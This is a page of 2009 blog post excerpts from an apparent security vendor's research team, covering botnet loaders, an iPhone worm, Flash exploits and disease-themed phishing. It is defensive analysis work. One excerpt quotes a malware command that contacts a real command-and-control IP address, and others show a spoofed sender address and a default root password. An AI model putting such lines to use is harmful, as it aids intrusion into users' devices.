Latest Posts | Page 137


Overall malware volume returned to pre-October levels this period, after two months of record activity driven by ZBot, Bredolab and Pushdo/Cutwail. Nonetheless, the Bredolab loader returned to top spot with a vengeance this period, accounting for a whopping 66.5% of total detected malware activity. Again, as we have seen time and time again these attack campaigns typically do not last longer than a couple of days, but can return quickly in mass volume. The seeding engines (largely the Cutwail spamming trojan) behind Bredolab certainly have a lot... [Read More]
by RSS Derek Manky  |  Dec 28, 2009  |  Filed in: Security Research
While looking at some Pushdo botnet messages recently, I noticed a repeating pattern in the data. Here is an example, taken from an area where the pattern is most obvious: 0340 13 63 cc 69 13 63 cc 69 13 63 cc 69 53 63 cc 2b .c.i.c.i.c.iSc.+ 0350 13 63 cc 69 13 63 cc 69 13 63 cc 69 13 63 cc 69 .c.i.c.i.c.i.c.i 0360 13 63 cc 69 13 63 cc 69 13 63 cc 69 13 63 cc 69 .c.i.c.i.c.i.c.i This looked to me like a flaw in the encryption that potentially could be used for detection purposes. It might even be possible to automatically break the encryption. It... [Read More]
by RSS Doug Macdonald  |  Dec 15, 2009  |  Filed in: Security Research
** **Cyber crime continues to adapt to modern services and infrastructure, often leveraging legitimate services for malicious purposes. On top of this, blackhat services are also being created to aid in attacks. The result is a growing infrastructure available to cyber criminals who continue to innovate attack methodologies. Let's have a look at some examples. Leveraging Modern Services The use of legitimate web hosting for attacks is obviously not new - think of Geocities and Google Pages which were frequently abused in the past (which incidentally... [Read More]
by RSS Derek Manky  |  Dec 11, 2009  |  Filed in: Security Research
Tags:
** **iPhoneOS/Eeki.B!worm is said to contain two malicious binaries: sshd, the binary searching for new victims, and duh, a binary found only in variant B and after which some antivirus companies named the worm. This article focuses on the latter. Duh is called by a malicious script named_ syslog_ (of course, there's no relationship with the traditional UNIX daemon syslog - it's just named that way to look less suspicious than if was named bighacki.sh!): <span style="color: #993300;">/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID... [Read More]
by RSS Axelle Apvrille  |  Dec 10, 2009  |  Filed in: Security Research
Remember some 10 years ago, when the web browser market was stagnating? Thankfully, those days seem to be long gone now, thanks to a rather intensive competition fostering innovation. A real bliss for the end users, now facing a relatively wide offer of (all free) browsers - the five most popular being: Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Google Chrome and Opera. Yet, the market shares of those are tremendously different: The September 2009 trends from AT Internet Institute (taken from 23 European countries - see above),... [Read More]
by RSS David Maciejak  |  Dec 09, 2009  |  Filed in: Security Research
We have put up our November 2009 Threat Landscape Report, which shows movement amongst annual malware records set for 2009. Malware continued to be distributed in peak volume this period, building off a charge that began in September 2009. Last report, Bredolab and Scareware were the main occupants in our malware top 10 listing -- and were setting records in terms of daily detected volume. Now, a battle of the bots has ensued with Pushdo / Cutwail firmly taking the reigns. In latest developments, we observed a Pushdo variant attempting to remove... [Read More]
by RSS Derek Manky  |  Dec 02, 2009  |  Filed in: Security Research
Tags:
Unless you have been cut from the net this last week, you probably know by now iPhones are facing their first set of malware (first ? well, actually, not quite as we have already detected spyware for iPhones): it's just all over the web. Those malware target jailbroken iPhones whose the default root password ('alpine') hasn't been changed. Consequently, most people remind/advise iPhone owners to customize root's password or not to jailbreak their iPhone. This is correct, but it is nonetheless worth adding that: all passwords should be customized:... [Read More]
by RSS Axelle Apvrille  |  Dec 02, 2009  |  Filed in: Security Research
AV Lab's honeypots have just started catching new malware seeding campaigns leveraging vaccination profiles for the H1N1 virus. The message is sent as a notification from the "Centers for Disease Control and Prevention (CDC)". Because the sender's email is spoofed and because the URL leading to the rogue website contains a "gov" subdomain, which can be mistaken for the top-level domain, the message may seem plausible to many people. Here is what the email looks like: From: "Centers for Disease Control and Prevention (CDC)" <info-mess-id:01203428med@cdcmails.gov>... [Read More]
by RSS Karine de Ponteves  |  Dec 01, 2009  |  Filed in: Security Research
Flash exploits targeting the old integer overflow vulnerability (CVE-2007-071) in Flash Player are still relatively active and multiplying on the base of the early versions exploit code, with more or less slight differences. One such variation was rendered tremendously more stealth and reliable, thanks to the use of a Flash run-time packer spawning a multiplexer component. It is caught as SWF/Dloader!exploit by Fortinet, yet, detection of this peculiar variant across the spectrum of antivirus products is still extremely scarce. Let's lift the lid... [Read More]
by RSS Bin Liu  |  Nov 20, 2009  |  Filed in: Security Research
Since my last post on Jane Doe and Bredolab, John has been slightly jealous of her fame. He told me that, he too, as a manager of the returned material service, was dealing with plenty of parcels and that he could have been the perfect target. As I was curious to see what a genuine shipment company e-mail looked like (to compare them with Bredolab), I asked him if I could have a quick look at his mailbox. I had hardly started reading his e-mails, that I ran into one that had me immediately start. For those of you who do not speak French, I have... [Read More]
by RSS Axelle Apvrille  |  Nov 16, 2009  |  Filed in: Security Research